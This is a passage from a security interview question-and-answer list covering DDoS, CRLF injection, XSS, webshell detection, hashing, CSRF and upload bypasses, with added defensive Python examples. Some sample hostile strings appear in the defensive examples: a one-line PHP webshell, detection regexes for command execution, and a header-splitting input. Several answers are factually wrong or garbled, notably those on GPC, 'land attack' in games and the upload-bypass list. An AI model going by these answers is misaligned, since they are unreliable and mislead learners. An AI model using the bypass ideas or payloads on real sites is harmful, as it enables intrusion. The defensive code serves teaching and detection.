3. The client sends a packet with an acknowledgment number (ACK) confirming the server's ISN, and the connection is established.
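The three-way handshake of questions 14 and 32 and the four-way wave of question 14, as an added example (my own code, not from the original page): two endpoints exchange the segments with explicit sequence and acknowledgment numbers, a SYN or FIN consumes one sequence number, and each ACK is checked against what the endpoint actually sent, which is the check that rejects a stale or forged acknowledgment. The ISNs 1000 and 5000 are constructed for readability; real stacks randomise them.

```python
class Endpoint:
    """One side of a TCP connection, tracking only what the handshake needs."""

    def __init__(self, name, isn):
        self.name = name
        self.state = "CLOSED"
        self.snd_nxt = isn      # next sequence number we send (starts at our ISN)
        self.rcv_nxt = None     # next sequence number we expect from the peer

    def segment(self, flags, ack=None):
        seg = {"from": self.name, "flags": flags, "seq": self.snd_nxt, "ack": ack}
        if "SYN" in flags or "FIN" in flags:
            self.snd_nxt += 1   # SYN and FIN each occupy one sequence number
        return seg


def accept_ack(endpoint, seg):
    """An ACK is valid only if it acknowledges exactly what we have sent so far.
    A delayed or forged segment carrying a stale ack number fails this test,
    which is how the third step keeps old requests from opening connections."""
    return seg["ack"] == endpoint.snd_nxt


def three_way_handshake(client, server):
    server.state = "LISTEN"
    syn = client.segment(("SYN",))                      # 1. SYN carries client ISN
    client.state = "SYN_SENT"
    server.rcv_nxt = syn["seq"] + 1
    synack = server.segment(("SYN", "ACK"), ack=server.rcv_nxt)  # 2. server ISN + ack
    server.state = "SYN_RCVD"
    if not accept_ack(client, synack):
        raise ValueError("SYN+ACK acknowledges a sequence number we never sent")
    client.rcv_nxt = synack["seq"] + 1
    ack = client.segment(("ACK",), ack=client.rcv_nxt)  # 3. ACK acks server ISN
    client.state = "ESTABLISHED"
    if not accept_ack(server, ack):
        raise ValueError("final ACK does not match server ISN+1")
    server.state = "ESTABLISHED"
    return [syn, synack, ack]


def four_way_close(client, server):
    fin1 = client.segment(("FIN", "ACK"), ack=client.rcv_nxt)     # 1. client FIN
    client.state = "FIN_WAIT_1"
    server.rcv_nxt = fin1["seq"] + 1
    ack1 = server.segment(("ACK",), ack=server.rcv_nxt)           # 2. server ACK
    server.state, client.state = "CLOSE_WAIT", "FIN_WAIT_2"
    fin2 = server.segment(("FIN", "ACK"), ack=server.rcv_nxt)     # 3. server FIN
    server.state = "LAST_ACK"
    client.rcv_nxt = fin2["seq"] + 1
    ack2 = client.segment(("ACK",), ack=client.rcv_nxt)           # 4. client ACK
    client.state, server.state = "TIME_WAIT", "CLOSED"
    return [fin1, ack1, fin2, ack2]


def trace(segments):
    """Compact (sender, flags, seq, ack) view of a segment list."""
    return [(s["from"], "+".join(s["flags"]), s["seq"], s["ack"]) for s in segments]


if __name__ == "__main__":
    c, s = Endpoint("client", 1000), Endpoint("server", 5000)
    for line in trace(three_way_handshake(c, s)) + trace(four_way_close(c, s)):
        print(line)
```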

33. Seven-layer model?

Physical layer --> Data link layer --> Network layer --> Transport layer --> Session layer --> Presentation layer --> Application layer

34. Understanding of cloud security

Cloud security refers to protecting the security of cloud and cloud-related resources in a cloud computing environment. Cloud security includes protecting the security of cloud computing infrastructure, the security relationship between cloud service providers and cloud users, and the security of data stored and processed in the cloud.

Cloud security requires a series of measures to ensure the security of the cloud computing environment. These measures include but are not limited to:

1. Authentication and access control: Ensure that only authorized users can access cloud services and data stored in the cloud.

2. Data protection: Use data encryption, backup, disaster recovery and other measures to protect the security of data stored in the cloud.

3. Network security: Ensure the reliability and security of the network and prevent network attacks.

4. Compliance: Ensure the compliance of cloud services and meet relevant laws, regulations and standard requirements.

5. Security monitoring and log auditing: Discover and respond to security events and threats by monitoring and auditing operations and activities in the cloud.

35. Have you ever learned about websocket?

Yes, I have.

WebSocket is a network protocol for full-duplex communication over a single TCP connection. It makes real-time data transfer between browser and server easier. Unlike the HTTP request-response protocol, the WebSocket connection remains open, allowing two-way communication, so data can be updated in real time over the WebSocket connection without the need for constant HTTP requests to obtain updates.

The establishment of a WebSocket connection requires a handshake process, during which the client and server exchange information to establish the connection. After a successful connection is established, the client and server can send messages to each other. These messages can be in formats such as text, binary data, or JSON. On the server side, the WebSocket API is typically used to handle received messages and respond to client requests.

Because the WebSocket protocol runs on a single TCP connection, network latency and bandwidth consumption can be reduced. It also allows the server to push data to the client, which is useful for real-time data updates and instant messaging.

It is often used in web development.

36. What is DDoS? What kinds are there? What is a CC attack? What are the differences?

1. DDoS is a type of network attack. The attacker controls multiple computers or devices and sends a large number of requests to the target server or network, so that it can no longer process legitimate traffic and the service becomes unavailable. The attacker's goal is usually to stop the target system from providing normal service, causing economic losses or damaging its reputation.

2. Common DDoS attack methods include:

SYN Flood: Exploits the way the TCP three-way handshake works by sending a large number of SYN requests that are never completed, exhausting server resources.

ICMP Flood: Use the ping command to send a large number of ICMP requests to the target server, exhausting server resources.

UDP Flood: Utilizes the characteristics of the UDP protocol to send a large number of UDP data packets, occupying server bandwidth and CPU resources.

3. A CC attack (HTTP Flood) is a special kind of DDoS attack that mainly targets web servers. Attackers forge HTTP requests, send a large number of them to the web server and simulate user access, overloading the server so that it cannot process legitimate traffic.

4. Differences:
Different attack targets: DDoS attacks target an IP address, while CC attacks target web pages.
The harm is different: DDoS attacks are more harmful and more difficult to defend against. The harm of CC attacks is not devastating, but it lasts for a long time.
Different thresholds: The threshold for DDoS attacks is high. Attackers generally need to collect information such as the number of target hosts under attack, their addresses, and the configuration performance of the target hosts before attacking. Blind attacks may lead to poor results. The CC attack threshold is low, and the attack can be carried out by using the IP proxy tool. The target is relatively clear, and users with relatively low hacker skills can also carry out the attack.
Different traffic sizes: DDoS attacks require larger traffic than CC attacks, and CC attacks sometimes do not require large traffic.

37. What is a land attack?

1. In the field of computer security, a "land attack" refers to an early denial of service (DoS) technique. The attacker sends specially crafted IP packets to the target computer in which the source IP address and destination IP address are both set to the target's own IP address. The target computer falls into an endless loop answering itself and eventually cannot respond to other network requests. The attack is rare today because modern operating systems have fixed the vulnerability.

2. If you mention "land attack" in the field of online games, then it refers to an attack method that exploits game engine vulnerabilities. Attackers can use these vulnerabilities to cause the target player's game client to crash or freeze. This attack can also be considered a DoS attack.

38. How will you collect information?

Collect second-level domain names, IP addresses and sensitive information, fingerprints, WAF identification, CDN identification, and adjacent C-segment (/24) ranges.

39. What is a CRLF injection attack?

A CRLF injection attack is a web application vulnerability that allows an attacker to inject malicious HTTP response headers into the HTTP headers. An attacker can use a CRLF injection attack to manipulate HTTP responses to gain access to the server, or an attacker can bypass security controls to gain unauthorized access to sensitive information.
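The mechanism behind the answer above is that a CR/LF pair ends a header line, so an untrusted value placed in a header can begin a new one. The block below is an added example, not from the original page: it shows an unsanitized header builder beside one that refuses control characters, and parses the result the way a client would. The header names and tainted input are constructed.

```python
"""Why a CR/LF in a header value splits the HTTP response, and the check that
refuses such values before they reach the response.

Added example, not from the original page. The header names, the parser and
the tainted input are constructed for illustration.
"""


class HeaderInjectionError(ValueError):
    pass


def set_header_unsafe(block, name, value):
    """'Before' form: copies the untrusted value straight into the header block."""
    return block + f"{name}: {value}\r\n"


def set_header_safe(block, name, value):
    """Refuse any CR, LF or NUL in a header value instead of emitting it."""
    if any(ch in value for ch in "\r\n\0"):
        raise HeaderInjectionError(f"control character in value of {name}")
    return block + f"{name}: {value}\r\n"


def parse_header_block(raw):
    """Split a header block the way a client would: one (name, value) per CRLF line."""
    headers = []
    for line in raw.split("\r\n"):
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return headers


# Constructed input: a redirect target with an embedded CRLF and a second header.
TAINTED_LOCATION = "https://example.test/home\r\nSet-Cookie: session=attacker-chosen"


def demo():
    """Return (headers the client sees when unsanitized, whether the safe path refused it)."""
    seen = parse_header_block(set_header_unsafe("", "Location", TAINTED_LOCATION))
    try:
        set_header_safe("", "Location", TAINTED_LOCATION)
        refused = False
    except HeaderInjectionError:
        refused = True
    return seen, refused
```

Rejecting the value is preferable to stripping the characters: a value that contains CR/LF is never a legitimate redirect target, and silently editing it can hide the attempt from logs. Modern frameworks apply the same check in their response objects, but hand-written header code and proxies often do not.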

40. To prevent XSS, think from two perspectives: front-end and back-end?

Front end:

1) Use HTTPS protocol to protect user data and transmit data.

2) Use escape characters to filter special characters entered by users to prevent attackers from injecting malicious JavaScript code.

3) Users are prohibited from uploading executable files, such as .exe, .vbs, etc.

4) Use HTTP headers to limit the loading of web page content to prevent XSS attacks.

Back end:

1) Use parameter verification to check whether the data entered by the user meets the requirements. If it does not meet the requirements, access is denied.

2) Use prepared statements to execute SQL queries to prevent SQL injection attacks.

3) Use secure encryption algorithms to encrypt data to prevent data leakage.

4) Use secure HTTP headers to limit the loading of web page content to prevent XSS attacks.
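Points 2 and 4 on both lists come down to two concrete controls: context-aware output encoding and a Content-Security-Policy header. As an added example that is not part of the original page, the block below shows an unescaped template beside its escaped form, the attribute and JavaScript-string contexts that plain HTML escaping does not cover, and a constructed CSP. The policy values are assumptions; a real one lists the origins the site actually loads from.

```python
"""Output encoding for the HTML context plus a Content-Security-Policy header,
which is the concrete form of points 2 and 4 above.

Added example, not from the original page. The template, the policy and the
sample input are constructed; a real policy lists the origins the site uses.
"""
import html

# Constructed policy: same-origin scripts only, no inline script, no plugins.
SECURITY_HEADERS = [
    ("Content-Security-Policy",
     "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"),
    ("X-Content-Type-Options", "nosniff"),
]


def render_unsafe(display_name):
    """'Before' form: untrusted text concatenated into HTML."""
    return f"<p>Welcome, {display_name}</p>"


def render_safe(display_name):
    """HTML context: escape &, <, >, quotes so the browser treats the value as text."""
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


def render_attr_safe(url):
    """Attribute context: escaping plus a scheme allow-list, because escaping
    alone does not stop a 'javascript:' URL inside an href."""
    if not url.lower().startswith(("https://", "http://")):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">profile</a>'


def escape_js_string(value):
    """JS string-literal context (inside <script>): escape the characters that
    could end the string or the script block."""
    return (value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
                 .replace("<", "\\u003c").replace(">", "\\u003e")
                 .replace("\n", "\\n").replace("\r", "\\r"))


SAMPLE_INPUT = "<script>alert(1)</script>"   # constructed probe string
```

The escaping function must match the context the value lands in (HTML body, attribute, URL, JavaScript string); applying the HTML escaper everywhere is the most common reason "we escape everything" sites still have XSS. The CSP then limits what an injected script could do even if one encoding step is missed.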

41. How to protect the security of a port?

1. Use a firewall: A firewall can protect port security by blocking unauthorized network traffic from entering the network.

2. Install security software: Installing security software can detect and block the intrusion of malware and viruses, thereby protecting port security.

3. Implement security policies: Implementing security policies can restrict users from accessing specific ports, thereby protecting port security.

4. Regularly update the operating system: Regularly updating the operating system can fix vulnerabilities and thus protect port security.

5. Encrypted data transmission: Data transmission can be protected using encryption technology to protect port security.

42. Webshell detection ideas?

1. Check the file name: Check whether the file name looks like a known webshell name; if so, it may be a webshell.

2. Check the file content: Check whether the file content contains webshell characteristics; if so, it may be a webshell.

3. Check file permissions: Check whether the file permissions have been changed; if so, it may be a webshell.

4. Check the file time: Check the creation time and modification time of the file; if they are abnormal, it may be a webshell.

5. Check the file size: Check the file size; if it is abnormal, it may be a webshell.
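The five checks above combine naturally into a scoring triage. The block below is an added example (not from the original page) that scores each file on name, content signatures, permission bits, modification time relative to the last deployment, and size, and lists files that trip more than one check. The file set is constructed in memory so it runs offline; the signatures, the deployment timestamp and the thresholds are assumptions.

```python
"""Heuristic webshell triage that scores files on the five checks above
(name, content, permissions, timestamps, size).

Added example, not from the original page. The file set is constructed in
memory so it runs offline; the signatures and thresholds are assumptions and
a real scan would read the web root from disk.
"""
import re
from datetime import datetime, timedelta

SUSPICIOUS_NAME = re.compile(r"(shell|cmd|backdoor|c99|r57|\.php\.(jpg|png|gif|txt)$)", re.I)
SUSPICIOUS_CONTENT = [
    re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)", re.I),
    re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I),
    re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),  # variable function call on input
    re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I),         # /e modifier
]


def score_file(entry, deploy_time, typical_size=(200, 200_000)):
    """entry: {"path", "content", "mode", "mtime"}; returns (score, reasons)."""
    reasons = []
    if SUSPICIOUS_NAME.search(entry["path"]):
        reasons.append("suspicious file name")
    for pat in SUSPICIOUS_CONTENT:
        if pat.search(entry["content"]):
            reasons.append("webshell-like code pattern")
            break
    if entry["mode"] & 0o002:
        reasons.append("world-writable")
    if entry["mtime"] > deploy_time + timedelta(minutes=5):
        reasons.append("modified after the last deployment")
    size = len(entry["content"])
    if not typical_size[0] <= size <= typical_size[1]:
        reasons.append("unusual size for a source file")
    return len(reasons), reasons


def triage(entries, deploy_time, min_score=2):
    """Return [(path, score, reasons)] for files that trip at least min_score checks."""
    hits = []
    for e in entries:
        score, reasons = score_file(e, deploy_time)
        if score >= min_score:
            hits.append((e["path"], score, reasons))
    return sorted(hits, key=lambda h: -h[1])


DEPLOY_TIME = datetime(2024, 3, 1, 9, 0)   # constructed: last known-good deploy
SAMPLE_FILES = [  # constructed web root snapshot
    {"path": "index.php", "content": "<?php\n" + "// ordinary application code\n" * 10,
     "mode": 0o644, "mtime": DEPLOY_TIME},
    {"path": "uploads/img.php.jpg",
     "content": "<?php eval(base64_decode($_POST['c'])); ?>",
     "mode": 0o666, "mtime": DEPLOY_TIME + timedelta(days=2)},
]

if __name__ == "__main__":
    for path, score, reasons in triage(SAMPLE_FILES, DEPLOY_TIME):
        print(f"{path}: score {score} ({', '.join(reasons)})")
```

Requiring two or more indicators keeps a legitimate but oddly named file from being flagged on its own, while a file that is both writable by everyone and modified after the last deployment is worth a look even before its content is read. Comparing against a known-good deployment manifest (hashes of every shipped file) is the stronger version of checks 4 and 5.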

43. What is GPC? How to bypass it if it is enabled?

GPC is the abbreviation of GET, POST, and COOKIE, which is used to describe the three types of data that users can submit when submitting a URL. If you want to bypass GPC, you can use URL rewriting, pseudo-static, XMLHttpRequest and other technologies.

URL rewriting can place URL parameters in the URL path, but they will not be displayed in the URL, thus avoiding GPC filtering.

Pseudo-static can rearrange a normal URL to make it look more attractive, or hide URL parameters to bypass GPC filtering.

XMLHttpRequest can send POST requests to the backend without any URL parameters, thus avoiding GPC filtering.

44. What are the encryption algorithms commonly used on the web?

1. MD5: Message-Digest Algorithm 5, information digest algorithm, often used for file verification.

2. SHA: Secure Hash Algorithm, a secure hash algorithm, commonly used in security authentication scenarios such as digital signatures.

3. HMAC: Hash-based Message Authentication Code, often used for message integrity verification.

4. AES: Advanced Encryption Standard, advanced encryption standard, often used for data encryption.

5. RSA: Rivest-Shamir-Adleman, commonly used for digital signatures and encryption.

6. DES: Data Encryption Standard, data encryption standard, often used for encryption and decryption.

7. 3DES: Triple DES, triple data encryption algorithm, is an improved version of DES.

8. Blowfish: A symmetric encryption algorithm that can be used to encrypt large amounts of data.

9. Twofish: A symmetric encryption algorithm that can be used to encrypt large amounts of data.

10. RC4: A stream cipher algorithm that can be used to encrypt large amounts of data.

11. PBKDF2: Password-Based Key Derivation Function 2, password-based key derivation function 2, often used to encrypt passwords.

12. Bcrypt: A password hash function that can be used to encrypt passwords.

13. scrypt: A password hash function that can be used to encrypt passwords.

14. Argon2: A password hash function that can be used to encrypt passwords.
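The hash-family entries above (SHA, HMAC, PBKDF2) are easy to confuse because all three produce a fixed-length digest, yet they answer different questions. As an added example that is not from the page, the block below uses Python's standard library for each job: SHA-256 as an unkeyed integrity digest, HMAC-SHA256 for keyed message authentication, and salted, iterated PBKDF2-HMAC for stored passwords. The key, salt handling, iteration count and inputs are constructed assumptions.

```python
"""Using SHA-256, HMAC and PBKDF2 from the list above for their distinct jobs:
integrity digest, keyed message authentication, and password storage.

Added example, not from the original page. Keys, salts, iteration count and
sample inputs are constructed; production code takes the salt from os.urandom
(as hash_password does by default) and tunes iterations to its hardware.
"""
import hashlib
import hmac
import os


def file_digest(data):
    """Unkeyed integrity check (e.g. a download checksum): SHA-256 hex digest."""
    return hashlib.sha256(data).hexdigest()


def sign_message(key, message):
    """HMAC-SHA256 tag: proves the message came from a holder of the key."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_message(key, message, tag):
    """Constant-time comparison so tag checks do not leak timing information."""
    return hmac.compare_digest(sign_message(key, message), tag)


def hash_password(password, salt=None, iterations=600_000):
    """Salted, iterated PBKDF2-HMAC-SHA256; stored as algorithm$iters$salt$hash."""
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${derived.hex()}"


def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count, then compare in constant time."""
    algorithm, iterations, salt_hex, hash_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                  bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(derived.hex(), hash_hex)
```

Two points the list glosses over: a plain digest (MD5, SHA) detects accidental corruption but not tampering, since anyone can recompute it, which is why integrity against an adversary needs a key (HMAC) or a signature (RSA); and password storage is a hashing problem, not an encryption one, because the server should never need the password back, only to check a candidate against it, which is what the salted, slow derivation provides.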

45. What else can XSS do besides obtaining cookies?

Other things that XSS can be used to do are:

1. Hijacking user sessions: Through XSS attacks, attackers can access the victim’s user session to obtain the user’s login credentials or other sensitive information.

2. Modify the content of the web page: XSS attacks can be used to modify the content of the web page to deceive the victim.

3. Destroy the website structure: XSS attacks can be used to destroy the website structure, thus affecting the normal operation of the website.

4. Obtain user data: XSS attacks can be used to obtain users’ sensitive information, such as users’ personal information, financial information, etc.

5. Execute malicious scripts: XSS attacks can be used to execute malicious scripts to attack websites or perform other malicious activities.

6. Spread worms: XSS attacks can be used to spread worms, thereby spreading malicious programs in the victim's network.

7. Hijacking browsers: XSS attacks can be used to hijack browsers to control users’ browsing habits.

8. Pop-up malicious advertisements: XSS attacks can be used to pop up malicious advertisements, thus affecting the normal use of users.

9. Inject malicious code: XSS attacks can be used to inject malicious code, thereby affecting the normal operation of the website.

10. Manipulate search results: XSS attacks can be used to manipulate search results to allow victims to access the website the attacker intended them to access.

11. Spreading Trojans: XSS attacks can be used to spread Trojans to attack websites or steal user information.

12. Hijacking a website: XSS attacks can be used to hijack a website and thereby control its content and functionality.

46. Operator (or other) network hijacking

1. When a network hijack occurs, the request is intercepted by the operator (or other hijacker), and they send a response. Hijackers may insert malicious content, place ads, and modify content by injecting scripts. Hijackers may intercept specific content as well as users' HTTP requests, thereby controlling the user's browsing experience.

2. Network hijacking may cause security and privacy issues because hijackers can collect users' sensitive information, such as user credentials and login information. It may also result in reduced network traffic and the web pages may become very slow due to ads and injected scripts.

3. To avoid network hijacking, you can use SSL/TLS protocols to protect communications, verify websites before sending sensitive data, and use a trusted VPN to encrypt communications. Additionally, you should regularly update your device’s operating system and browser, and only download software or applications from trusted sources.

4. To continue to prevent network hijacking, some dangerous functions in the network should be disabled, such as domain name server (DNS) dynamic updates, DNS redirection, and remote access functions. Additionally, security software should be set up to help detect potential network hijacking activity. Finally, operators can set up grayscale testing policies to help detect breaches of activity.

47. What is DNS spoofing?

DNS spoofing is a cyberattack technique that alters the local DNS (Domain Name System) tables on the Internet that look up web servers and other Internet resources. By changing the DNS records on the server, an attacker can redirect Internet traffic to an attacker-controlled server, which can be used to steal data, plant malware, or redefine unauthorized network configurations.

48. Buffer overflow principles and defenses

Buffer overflow is a software vulnerability in which an attacker can exploit a memory unit that holds data to cross-border access to other memory spaces. Accessing such memory can cause the system to crash or execute malicious code.

To prevent buffer overflow attacks, a variety of measures can be taken, including using stack protection mechanisms (such as stack overflow protection and bounds-checked buffers), using isolated memory technology (ASLR), and using deep inspection technologies (such as malicious code inspection and decompilation checks). In addition, dynamic analysis technology (such as online analysis) and code audit technology can also be used to prevent buffer overflows.

49. Emergency response to network security incidents

Cyber security incident emergency response means that when a cyber security incident occurs, enterprises should organize relevant departments to coordinate and take corresponding response measures in a timely manner according to the requirements of the cyber security emergency response plan or cyber security incident plan.

It includes:

(1) Emergency plan design: Predict and analyze security incidents, and formulate network security emergency response plans and network security incident handling plans to respond to network security incidents.

(2) Fault elimination: Organize resources to conduct safety fault analysis, identify the cause of the fault and eliminate the source of the fault.

(3) Incident processing: Identify, analyze and handle network security incidents, and improve the follow-up processing process.

(4) Implementation of control measures: Develop and implement effective management measures to prevent the recurrence of network security incidents.

(5) Risk warning: Establish a network security risk early warning system and strictly improve network security management to prevent network security incidents in a timely manner.

(6) Data disposal: Collect, process and store all data involved during disposal to avoid recurrence of security incidents.

(7) Emergency testing: Analyze the processed network security status and implement emergency testing to ensure network security availability after security recovery.

(8) Emergency assessment: Summarize the handling of safety incidents, evaluate the effectiveness of emergency handling, and take effective improvement measures to reduce the probability of safety incidents.

(9) Security awareness training: Conduct network security awareness training for employees to enhance their network security awareness and make them familiar with network security technology, security risk assessment technology and network security threat information processing technology to prevent network security incidents.

(10) Review and audit: Regularly review and audit network security incidents and emergency response activities, and establish a long-term security emergency response mechanism.

50. Internal security of the enterprise

Internal security management of an enterprise refers to the management of the internal security status of the enterprise by the internal management organization of the enterprise, including safety management systems, safety management measures, safety management organizations and safety management personnel.

1. Develop a safety management system: Enterprises should formulate a safety management system to clarify the responsibilities, authorities and procedures of safety management to ensure the effective implementation of safety management.

2. Implement safety management measures: Enterprises should adopt effective safety management measures according to the safety management system to ensure the stability of the internal safety situation of the enterprise.

3. Establish a safety management organization: Enterprises should establish a safety management organization to be responsible for safety management and ensure the effective implementation of safety management.

4. Training safety management personnel: Enterprises should regularly train safety management personnel to equip them with safety management knowledge and skills to ensure the effective implementation of safety management.


5. Regularly check the security status: Enterprises should regularly check the internal security status of the enterprise, promptly discover safety hazards, and take effective measures to ensure the stability of the internal security status of the enterprise.

6. Handle safety incidents in a timely manner: Enterprises should handle safety incidents in a timely manner, analyze the causes of the accidents, and take effective measures to prevent safety incidents from occurring.

7. Regularly evaluate safety management: Enterprises should regularly evaluate the effectiveness of safety management, promptly discover problems in safety management, and take effective measures to ensure the effective implementation of safety management.

8. Regularly update the safety management system: Enterprises should regularly update the safety management system to adapt it to the actual situation of the enterprise to ensure the effective implementation of safety management.

9. Regularly carry out safety publicity: Enterprises should regularly carry out safety publicity to enable employees to fully understand the importance of safety management and ensure the effective implementation of safety management.

10. Establish safety files: Enterprises should establish safety files to record relevant information on safety management to facilitate the effective implementation of safety management.

51. How to test the business before going online and from what angles?

First, you need to know whether your website is functioning properly. If your website displays an error message, check it. If the website is functioning properly, you can test how well it works by testing its functionality, for example its page loading speed and page display.

Secondly, you need to know whether the content of your website is correct. If there is a problem with the content of your website, you can test its effectiveness by testing the format of the content and the structure of the data on your website. For example, you can test the formatting of your website's content and the structure of its data.

Finally, you need to know if your website has the right links. If you're having problems with your website's links, you can test its effectiveness by testing the structure and functionality of your website's links. For example, you can test the structure and functionality of your website's links.

52. The application has vulnerabilities but cannot be repaired or deactivated. What should you do?

1. Notify the application developer as soon as possible so that they can fix the vulnerability as soon as possible.

2. Minimize the use of applications to reduce the impact of vulnerabilities.

3. Limit application usage permissions to the minimum to reduce the impact of vulnerabilities.

4. Regularly check the security of applications, discover vulnerabilities in a timely manner and take effective measures.

5. Limit application usage to trusted environments to reduce the impact of vulnerabilities.

53. How to protect against CSRF?

1. Set a unique session identifier (similar to a token) every time the user logs in;

2. Append this session identifier to the form before submitting it;

3. After accepting form submission, use the session identifier to compare with the value previously stored on the server;

4. After successful verification, this identifier will be deleted or a new identifier will be regenerated;

5. If verification fails, the request will be rejected, the user will be redirected back to the login page, or a warning will be given.
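The five steps above describe a synchronizer-token scheme. The block below is an added example, not from the original page, that implements them end to end: a random token created at login and bound to the session, embedded as a hidden form field, compared in constant time on submission, rotated after a successful check, and refused otherwise. The in-memory session store is an assumption standing in for a real session backend.

```python
"""Synchronizer-token CSRF protection following the five steps above.

Added example, not from the original page. The session store is an in-memory
dict standing in for a real server-side session backend.
"""
import hmac
import secrets


class CsrfProtector:
    def __init__(self):
        self._sessions = {}   # session_id -> current CSRF token (server-side only)

    def login(self):
        """Step 1: on login, create a session and a fresh unguessable token."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = secrets.token_urlsafe(32)
        return sid

    def render_form(self, sid):
        """Step 2: embed the session's token as a hidden field in the form."""
        token = self._sessions[sid]   # token_urlsafe output is attribute-safe
        return f'<input type="hidden" name="csrf_token" value="{token}">'

    def validate(self, sid, submitted, rotate=True):
        """Steps 3-5: compare the submitted value with the stored one in constant
        time; on success rotate the token, on failure reject the request."""
        expected = self._sessions.get(sid)
        if expected is None or submitted is None:
            return False
        if not hmac.compare_digest(expected, submitted):
            return False
        if rotate:
            self._sessions[sid] = secrets.token_urlsafe(32)
        return True


def token_from_form(form_html):
    """Helper for demos/tests: read the hidden field back out of the rendered form."""
    return form_html.split('value="')[1].split('"')[0]
```

The token is tied to the session rather than being a global value, so a token an attacker obtains from their own session is useless against another user. Rotation per successful request is the strictest variant the steps describe; many frameworks keep one token per session instead, which is still sound as long as the cookie carrying the session is SameSite and the token is never placed in a URL.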

54. How to bypass file upload?

1. File extension bypass: Change the file suffix to a common file extension, such as .js, .jpg, .exe, etc.;

2. Modify the file extension based on the file header information: Some image files, such as png, gif, jpg, etc., have their own file headers, and their file headers can be modified at the beginning of the file;

3. Upload using base64 encoding: Encode the file to be uploaded with Base64, and then upload it in combination with XMLHttpRequest;

4. String file upload: convert it into a string according to the file format, and then use eval and other functions to obtain the value;

5. "Multipart/form-data" information: Generally, Web applications use this format to upload files, using multi-level segmentation to pass a string $_FILES file field array;

6. Use database to store files: You can treat files as binary data, store them in the database, and then obtain the path to download;

7. Missing file types: Try to upload various types of files to bypass restrictions with illegal file types, such as JSP, etc.;

8. Exe reflection: Exe reflection loading is to compile unmanaged code (such as C++) into an executable module and load it from the executable program into the current application domain.
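From the defender's side, points 1 and 2 above (renamed extensions and forged headers) are what a server-side validator has to close. The block below is an added example, not from the original page: it accepts a single allow-listed extension, refuses double extensions and NUL bytes, ignores the client's Content-Type in favour of the leading bytes, caps the size, and stores under a random name. The allow-list, size cap and sample payloads are constructed.

```python
"""Server-side upload validation that closes the extension and header tricks
listed above (double extensions, NUL bytes, mismatched magic bytes).

Added example, not from the original page. The allow-list, size cap and
sample payloads are constructed.
"""
import os
import re
import secrets

# Allowed extension -> accepted leading magic bytes (constructed allow-list)
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data):
    """Return a random server-side file name for an acceptable upload, or raise."""
    if "\0" in filename:
        raise UploadRejected("NUL byte in file name")
    base = os.path.basename(filename.replace("\\", "/")).strip()
    parts = base.lower().split(".")
    # Exactly one extension: 'shell.php.jpg' and 'shell.jpg.php' are both refused.
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise UploadRejected("file name must be name.ext with a single extension")
    ext = parts[1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} is not allowed")
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # The client's Content-Type is ignored; the bytes must match the extension.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match the declared type")
    # Never reuse the client-supplied name on disk.
    return f"{secrets.token_hex(16)}.{ext}"


def rejection_reason(filename, data):
    """None if the upload passes, otherwise the reason it was refused."""
    try:
        validate_upload(filename, data)
    except UploadRejected as exc:
        return str(exc)
    return None


JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 64   # constructed JPEG-like header
```

A magic-byte check on its own does not defeat a polyglot (a file with a valid image header followed by script), which is the point behind item 2 above. The validator therefore has to be paired with storage outside the web root or with script execution disabled for the upload directory, delivery with `X-Content-Type-Options: nosniff`, and, for images, re-encoding through an image library so only pixel data survives.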

55. Verification code related utilization points

1. **Registration function bypass:**  

You can use tools to submit HTTP requests to the form containing the verification code on the specified page, crack the verification code, and ultimately achieve successful registration. However, the mobile phone cannot receive the SMS verification information, thus bypassing operations such as mobile phone binding.

2. **Access to restricted features:**  

Verification codes can be used to improperly access restricted functions. When the functions have been designed, only specific users can access them. However, if means such as cracking are used, illegal access can be achieved.

3. **Front desk form submission:**  

When the front-end form is submitted, the verification code is used to crack the correct submission of the system, so that as long as the correct verification code is cracked, the form can be submitted without restriction, which ultimately leads to abnormal system load in the background.

4. **Get gifts:**  

Cracking the verification code can obtain a large number of gifts, even some special gifts with a certain value, thereby achieving the attacker's benefit.

Verification code defense methods

1. **Accurate verification:**  

When comparing the verification code with the verification code entered by the user, it is accurate to compare spaces and punctuation marks, thereby reducing the chance of the verification code being cracked.

2. **Use image verification code:**  

Because the image verification code uses real pictures, it increases the difficulty of verification, so it can better prevent robot attacks and the possibility of being cracked by scripts.

3. **Dynamic adjustment of verification code:**  

Dynamically adjust the form of the verification code so that the verification code is displayed differently each time, which not only deceives the machine, but also reduces the possibility of brute force cracking.

4. **Timely update and update the verification code strategy:**  

With the continuous development of technology, the methods that are effective for cracking verification codes are also constantly changing. Therefore, verification codes should be updated in time, and longer and more complex verification codes should be used to make cracking as difficult as possible.
